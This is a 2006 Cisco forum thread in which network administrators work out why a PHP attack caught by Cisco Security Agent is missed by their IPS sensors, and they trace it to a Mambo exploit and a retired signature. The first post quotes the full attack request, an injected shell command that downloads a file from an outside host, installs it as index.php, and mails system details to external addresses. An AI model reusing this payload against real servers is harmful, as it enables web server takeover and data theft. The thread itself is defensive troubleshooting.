Buy or Renew
Buy or Renew
Duo Security forums now LIVE! Get answers to all your Duo Security questions. Learn more
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
cancel
Start a conversation
604
Views
0
Helpful
5
Replies

PHP exploit triggers Cisco Security Agent but NOT in Cisco IPS....why?

Go to solution
enelson
Level 1
Level 1

‎07-15-2006 11:14 AM - edited ‎03-10-2019 03:06 AM

Does anyone know which signature this exploit should trigger with the Cisco IPS sensor? Not sure if there is one or if we have it turned off?

We see this exploit hit our Exchange Servers many times during the week.

The process 'C:\WINNT\System32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) received the data '/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid] =1&GLOBALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: //220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%20kkparole@yahoo.com;uname%20-a%20|%20mail%20-s%20uname_i2_66.224.194.188%20michaelroul@yahoo. com;echo|'.

Labels:
0 Helpful
1 Accepted Solution

Accepted Solutions

Go to solution
mkirbyii
Level 1
Level 1

‎07-21-2006 10:54 AM

I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass" here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.

Hope this helps

M

View solution in original post

0 Helpful
5 Replies 5

Go to solution
fmeetz
Level 4
Level 4

‎07-20-2006 11:53 AM

Remove the IPS config file from the router and copy the config after restarting it.

0 Helpful

Go to solution
enelson
Level 1
Level 1
In response to fmeetz

‎07-20-2006 01:17 PM

We have approx 40 sensors...we never see a correlation between a php exploit caught on CSA with the IPS.

Are you aware of a signature related to this exploit?

0 Helpful

Go to solution
mkirbyii
Level 1
Level 1
In response to enelson

‎07-21-2006 10:42 AM

Could the php exploit be over 443? I do not believe CSA will tell you this. However, you could paste the url portion that CSA is reporting into a browser and send it to a web server over port 80 and see what the sensor does. What PHP exploit is this? Do you know if there is a Cisco sig out for this particular exploit?

M

0 Helpful

Go to solution
mkirbyii
Level 1
Level 1

‎07-21-2006 10:54 AM

I think this might be the mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for info. I searched on MySDN for mambo and found sig 5163 "Mambo Site Server Administrative Password ByPass" here is an excerpt from the description: "Administrative access is gained by sending a specific url using the index2.php script and the PHPSESSID variable." This looks similar to what you pasted in. Notice "index2.php". Your IPS may not have seen this if it was over 443.

Hope this helps

M

0 Helpful

Go to solution
enelson
Level 1
Level 1
In response to mkirbyii

‎07-21-2006 01:56 PM

Interesting...the global signature for 5163 is retired/disabled globally by Cisco. This signature was published August of 2001 but IMHO should be enabled and deny packet/deny flow should be set to block this activity.

0 Helpful
Customers Also Viewed These Support Documents
Review Cisco Networking products for a $25 gift card